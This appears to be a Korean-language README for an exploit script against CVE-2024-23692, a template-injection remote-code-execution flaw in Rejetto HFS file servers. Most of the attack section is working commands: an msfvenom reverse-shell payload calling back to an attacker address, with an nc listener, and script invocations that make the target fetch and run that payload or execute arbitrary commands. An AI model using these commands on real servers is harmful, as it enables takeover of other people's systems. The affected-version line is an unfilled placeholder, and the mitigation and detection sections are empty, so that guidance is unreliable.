
Rejetto HFS (HTTP File Server)는 간단한 웹 파일 서버로, 네트워크나 인터넷을 통한 파일 공유를 용이하게 합니다.
Rejetto HFS (HTTP File Server)는 네트워크나 인터넷을 통해 파일 공유를 용이하게 하는 간단한 웹 파일 서버입니다. 사용 편의성과 단순성에도 불구하고, 심각한 취약점(CVE-2024-23692)이 발견되어 서버가 공격자들의 표적이 되고 있습니다.
CVE-2024-23692는 Rejetto HFS에서 확인된 서버 사이드 템플릿 인젝션(SSTI) 취약점입니다. 이 취약점은 공격자가 서버에 악성 템플릿을 주입하고 실행할 수 있게 합니다. 악용될 경우 원격 코드 실행으로 이어져 전체 서버와 호스팅된 데이터를 손상시킬 수 있습니다.
이 취약점을 악용하는 공격자는 다음을 수행할 수 있습니다:
msfvenom으로 생성된 악성 바이너리를 사용하여 셸을 획득합니다.
참고: nc 리스닝 상태를 유지하세요.
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_1.png)
명령을 원격으로 실행합니다.
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo
결과가 표시되는 데 약 15초가 소요될 수 있습니다.
![[Screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_2.png)
[insert latest vulnerable version here] 버전을 포함한 모든 Rejetto HFS 버전이 이 취약점의 영향을 받습니다.
CVE-2024-23692가 제기하는 위험을 완화하기 위해 사용자는 다음을 권장합니다:
서버가 손상되었는지 확인하려면 다음을 살펴보세요:
추가 지원이 필요하면 Rejetto HFS 커뮤니티 포럼이나 공식 지원 채널을 참조하세요.
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.